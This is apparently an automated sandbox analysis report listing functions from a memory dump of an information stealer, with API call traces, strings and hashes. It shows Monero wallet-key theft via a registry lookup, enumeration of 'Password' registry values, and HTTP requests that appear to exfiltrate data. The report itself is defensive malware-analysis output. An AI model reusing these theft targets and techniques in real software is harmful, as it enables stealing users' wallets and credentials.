HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 0040506B
------, xrefs: 004051AD
", xrefs: 00405278
------, xrefs: 00404F4B
J&f, xrefs: 00405029
", xrefs: 004053BA
------, xrefs: 004052EF
--, xrefs: 00404F34
", xrefs: 00405136

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 1133489818-3705675087
Opcode ID: 89dceab915fcb2f9662f3f08dbe992963125cdc7033cf6d27e757e345a2065e4
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 89dceab915fcb2f9662f3f08dbe992963125cdc7033cf6d27e757e345a2065e4
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,02F516B8), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,02F56D40,00000000,?,02F31DB8,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,02F51848,?,02F56850,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
", xrefs: 00405AC6
-A, xrefs: 00405620, 00405D27, 00405623
------, xrefs: 00405746
", xrefs: 00405985
J&f, xrefs: 00405878
------, xrefs: 004058BB
------, xrefs: 004059FC

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: 3b02c82d54a2dce69af28d097823f837d4b587fa8d12081cef7ff7663c1a5608
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 3b02c82d54a2dce69af28d097823f837d4b587fa8d12081cef7ff7663c1a5608
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F519B8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: d82b56ad1bb06e02f0c83e43a8c1acbda9f64e57ca5500de3b55cb0825a83885
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: d82b56ad1bb06e02f0c83e43a8c1acbda9f64e57ca5500de3b55cb0825a83885
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F31E18,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F519B8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: f689771fe95e3438ecdedd52d37e7487edc6ccdaf1b45c77912d71908f213aff
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: f689771fe95e3438ecdedd52d37e7487edc6ccdaf1b45c77912d71908f213aff
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,02F516B8), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,02F516F8), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,02F51848,?,02F56850,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

------, xrefs: 004047E8
J&f, xrefs: 004047A5
", xrefs: 004048B2
", xrefs: 004049F3
------, xrefs: 0040467D
------, xrefs: 00404929

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: 0085aa7f071e5b9682321d38bb572c80461fbf4b0b2faa5da68e12ac8e1ad896
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: 0085aa7f071e5b9682321d38bb572c80461fbf4b0b2faa5da68e12ac8e1ad896
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,02F53108,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

?, xrefs: 00414B17
%s\%s, xrefs: 00414BEA
- , xrefs: 00414D40

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: e6e133757c573fac0daeb6e33494cbb002d9b9613c563283169ed0ec48b3ea5c
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: e6e133757c573fac0daeb6e33494cbb002d9b9613c563283169ed0ec48b3ea5c
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F519B8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 555a992b38588d5a5b433e998e6d44365b8e919369f67cd2378e1fa20942f89d
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: 555a992b38588d5a5b433e998e6d44365b8e919369f67cd2378e1fa20942f89d
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F31E18,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F516B8), ref: 00404ED9

Strings

.keys, xrefs: 0040132B
SOFTWARE\monero-project\monero-core, xrefs: 004012F5
\Monero\wallet.keys, xrefs: 0040134D
wallet_path, xrefs: 004012F0

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: de955a17eebbdbe5478c0259abf4e09c73e869fcd5bcfccf3c10ce6d84a7affc
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: de955a17eebbdbe5478c0259abf4e09c73e869fcd5bcfccf3c10ce6d84a7affc
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(2F754020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(2F754020,00000000), ref: 00407018
lstrcat.KERNEL32(2F754020, : ), ref: 0040702A
lstrcat.KERNEL32(2F754020,00000000), ref: 0040705F
lstrcat.KERNEL32(2F754020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(2F754020,00000000), ref: 004070A3
lstrcat.KERNEL32(2F754020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2
h0A, xrefs: 00406FA6, 00406FA9
: , xrefs: 0040701E

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 06d3826210fee43f1a11626030033b6516e58eaf46baf3067438e02c61b66ba9
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 06d3826210fee43f1a11626030033b6516e58eaf46baf3067438e02c61b66ba9
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
